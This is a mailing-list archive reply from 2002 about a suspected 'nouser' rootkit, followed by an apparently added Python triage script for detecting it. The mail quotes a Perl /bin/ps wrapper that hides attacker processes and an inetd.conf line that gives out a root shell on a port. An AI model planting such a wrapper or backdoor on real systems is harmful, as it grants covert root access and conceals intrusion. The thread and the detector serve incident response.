Security Incidents mailing list archives
Re: nouser - rootkit ?
From: Eric Brandwine <ericb () UU NET>
Date: 11 Mar 2002 17:57:38 +0000
"du" == Dan Uscatu <duscatu () phenomedia ro> writes:
du> [root@www /root]# cat /bin/ps
du> #!/usr/bin/perl
du> $xargs =join(' ',@ARGV);
du> $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
du> grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
du> print "$ps";

WOW! That is really lame! It may qualify as the first cross-platform root kit I've ever seen though ;)

This moron clearly does not know how to use perl regexps (among many other things). At least use fgrep!

du> i have scanned the machine using chkrootkit... the only funny thing found
du> was an inetd.conf, containing:
du> [root@www nouser]# cat /etc/inetd.conf
du> 65456 stream tcp nowait root /bin/sh sh
du> of course, inetd is not installed :) that points me to the idea that the
du> process was somehow automated... but i can't find any reference to a rootkit
du> that does these changes. seems pretty stupid for a rootkit anyway... but i
du> want to be sure no other major changes were made... before i install the
du> production server there.

This looks like a clueless kiddie cobbled together a bunch of stuff he found on the net, and packaged it up. Either it's a red herring, and the real root kit is much better hidden, or it'll be almost trivial to clean up. But you've no way of knowing. I'd rebuild the box from scratch, if it were mine.

Of much more importance is how he got in. Scrape this loser off your box, and another one will take his place. And the new one might not be quite so incompetent.

ericb
--
Eric Brandwine     | Contrary to the popular belief that it's hard to recover
UUNetwork Security | information, it's actually starting to appear that it's
ericb () uu net    | very hard to remove something even if you want to.
+1 703 886 6038    |     - Dan Farmer
Key fingerprint = 3A39 2C2F D5A0 FC7C 5F60 4118 A84A BD5D 59D7 4E3E
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
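The two artefacts quoted in the thread (a script wrapper installed as /bin/ps that pipes the real ps through `grep -v`, and an inetd.conf entry that spawns a root shell on a numeric port) are both cheap to confirm from the outside. The following is an added example, not code from the original mail or from chkrootkit or any other named tool; it assumes a Linux-style /proc and a procps `ps -e`, and the PIDs, ps output and inetd.conf text in the `__main__` block are constructed to mirror the symptoms described above.

```python
#!/usr/bin/env python3
"""Triage helpers for the two symptoms in the thread above.

Constructed example, not code from the original mail or from any named
tool.  It checks three things a defender would want to confirm quickly:
  1. whether /bin/ps is a real ELF binary or a script wrapper like the
     perl one quoted above,
  2. which PIDs exist in /proc but are missing from `ps` output (a
     wrapper that pipes through `grep -v` hides lines, not processes), and
  3. which inetd.conf entries hand a shell to the network as root.
The pure functions take their input as arguments so they can be run on
constructed data; the *_live helpers read the machine they run on.
"""
import os
import subprocess

ELF_MAGIC = b"\x7fELF"
SHELLS = {"sh", "bash", "ksh", "csh", "tcsh", "zsh", "ash", "dash"}


def classify_executable(head: bytes) -> str:
    """Classify an executable by its leading bytes: 'elf', 'script' or 'unknown'."""
    if head.startswith(ELF_MAGIC):
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    return "unknown"


def hidden_pids(proc_pids, ps_output: str):
    """Return PIDs present in /proc but absent from `ps -e`-style output.

    Each data line of `ps -e` starts with the PID; the header line and any
    other line whose first column is not numeric is skipped.
    """
    reported = set()
    for line in ps_output.splitlines():
        fields = line.split()
        if fields and fields[0].isdigit():
            reported.add(int(fields[0]))
    return sorted(set(proc_pids) - reported)


def suspicious_inetd_entries(inetd_conf: str):
    """Flag inetd.conf entries that look like the backdoor quoted above.

    Entry format: service socket-type protocol wait/nowait user program [args].
    Returns (service, program, reasons) for each flagged line.
    """
    findings = []
    for raw in inetd_conf.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed; not a complete inetd service entry
        service, _sock, _proto, _wait, user, program = fields[:6]
        reasons = []
        if service.isdigit():
            reasons.append("numeric service name (port %s)" % service)
        if user == "root" and os.path.basename(program) in SHELLS:
            reasons.append("shell spawned as root")
        if reasons:
            findings.append((service, program, reasons))
    return findings


def classify_executable_live(path="/bin/ps"):
    """Read the first four bytes of the real file on this machine."""
    with open(path, "rb") as fh:
        return classify_executable(fh.read(4))


def hidden_pids_live():
    """Compare /proc with the output of this machine's /bin/ps."""
    proc_pids = [int(d) for d in os.listdir("/proc") if d.isdigit()]
    out = subprocess.run(["/bin/ps", "-e"], capture_output=True,
                         text=True, check=False).stdout
    return hidden_pids(proc_pids, out)


if __name__ == "__main__":
    # Constructed data modelled on the mail: a process named "nouser" is
    # running as PID 1337, but the wrapper's `grep -v nouser` drops its line.
    sample_ps = (
        "  PID TTY          TIME CMD\n"
        "    1 ?        00:00:01 init\n"
        "   42 ?        00:00:00 sshd\n"
    )
    print("hidden:", hidden_pids([1, 42, 1337], sample_ps))
    print("wrapper?", classify_executable(b"#!/usr/bin/perl\n"))
    print("inetd:", suspicious_inetd_entries(
        "65456 stream tcp nowait root /bin/sh sh\n"))
```

Two caveats when running the live helpers on a suspect box: a process that starts or exits between the /proc listing and the `ps` run shows up as a false positive, so repeat the comparison and only trust PIDs that are missing every time; and the /proc comparison only catches userland filtering like the quoted wrapper, since a kernel-level rootkit would hide the directory entries in /proc as well. That limitation is one more reason the advice in the mail, rebuild from scratch, is the right call.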
Current thread:
- nouser - rootkit ? Dan Uscatu (Mar 10)
- Re: nouser - rootkit ? Eric Brandwine (Mar 11)
- Re: nouser - rootkit ? Ryan Russell (Mar 11)
- Re: nouser - rootkit ? Konrad Rieck (Mar 11)
- Re: nouser - rootkit ? Bruce Ediger (Mar 12)
- Re: nouser - rootkit ? Kyle R Maxwell (Mar 12)
- Re: nouser - rootkit ? Jose Nazario (Mar 12)
- Re: nouser - rootkit ? Eric Brandwine (Mar 12)
- Re: nouser - rootkit ? [:multiple root kit thread:] Dan Rohan (Mar 12)
- Re: nouser - rootkit ? Dave Dittrich (Mar 12)
- Re: nouser - rootkit ? Eric Brandwine (Mar 12)
- Re: nouser - rootkit ? Brian Hatch (Mar 12)
- Re: nouser - rootkit ? Eric Brandwine (Mar 11)